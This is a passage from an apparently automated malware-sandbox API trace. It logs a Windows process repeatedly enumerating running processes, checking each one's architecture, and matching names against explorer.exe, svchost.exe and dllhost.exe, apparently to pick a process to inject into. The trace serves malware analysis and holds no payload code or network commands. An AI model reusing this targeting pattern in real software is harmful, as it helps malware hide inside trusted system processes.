dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0234.632] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.632] CloseHandle (hObject=0xd8) returned 1 [0234.632] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0234.632] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0234.632] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0234.632] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0234.644] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0234.644] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.644] CloseHandle (hObject=0xd8) returned 1 [0234.645] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0234.645] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.645] CloseHandle (hObject=0xd8) returned 1 [0234.645] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0234.645] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0234.646] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0234.646] CloseHandle (hObject=0xd8) returned 1 [0234.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0234.647] CloseHandle (hObject=0xd4) returned 1 [0234.647] Sleep (dwMilliseconds=0x3e8) [0235.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0235.658] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0235.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0235.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0235.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0235.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0235.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0235.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0235.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0235.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0235.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0235.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0235.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0235.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0235.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0235.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0235.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0235.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0235.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0235.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0235.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0235.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.668] CloseHandle (hObject=0xd8) returned 1 [0235.668] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0235.668] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0235.668] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0235.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0235.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0235.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.669] CloseHandle (hObject=0xd8) returned 1 [0235.669] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0235.669] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0235.669] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0235.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0235.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0235.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0235.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0235.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.670] CloseHandle (hObject=0xd8) returned 1 [0235.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0235.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0235.671] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.671] CloseHandle (hObject=0xd8) returned 1 [0235.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0235.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0235.672] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.672] CloseHandle (hObject=0xd8) returned 1 [0235.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0235.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0235.672] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.672] CloseHandle (hObject=0xd8) returned 1 [0235.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0235.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0235.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.673] CloseHandle (hObject=0xd8) returned 1 [0235.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0235.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0235.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.673] CloseHandle (hObject=0xd8) returned 1 [0235.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0235.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0235.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.674] CloseHandle (hObject=0xd8) returned 1 [0235.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0235.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0235.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.675] CloseHandle (hObject=0xd8) returned 1 [0235.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0235.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0235.675] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.675] CloseHandle (hObject=0xd8) returned 1 [0235.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0235.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0235.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.676] CloseHandle (hObject=0xd8) returned 1 [0235.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0235.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0235.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.676] CloseHandle (hObject=0xd8) returned 1 [0235.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0235.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0235.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.677] CloseHandle (hObject=0xd8) returned 1 [0235.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0235.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0235.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.677] CloseHandle (hObject=0xd8) returned 1 [0235.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0235.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0235.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.678] CloseHandle (hObject=0xd8) returned 1 [0235.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0235.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0235.679] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.679] CloseHandle (hObject=0xd8) returned 1 [0235.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0235.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0235.679] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.679] CloseHandle (hObject=0xd8) returned 1 [0235.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0235.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0235.680] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.680] CloseHandle (hObject=0xd8) returned 1 [0235.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0235.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0235.680] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.680] CloseHandle (hObject=0xd8) returned 1 [0235.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0235.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0235.681] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.681] CloseHandle (hObject=0xd8) returned 1 [0235.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0235.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0235.681] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.681] CloseHandle (hObject=0xd8) returned 1 [0235.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0235.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0235.682] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0235.682] CloseHandle (hObject=0xd8) returned 1 [0235.682] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0235.683] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, 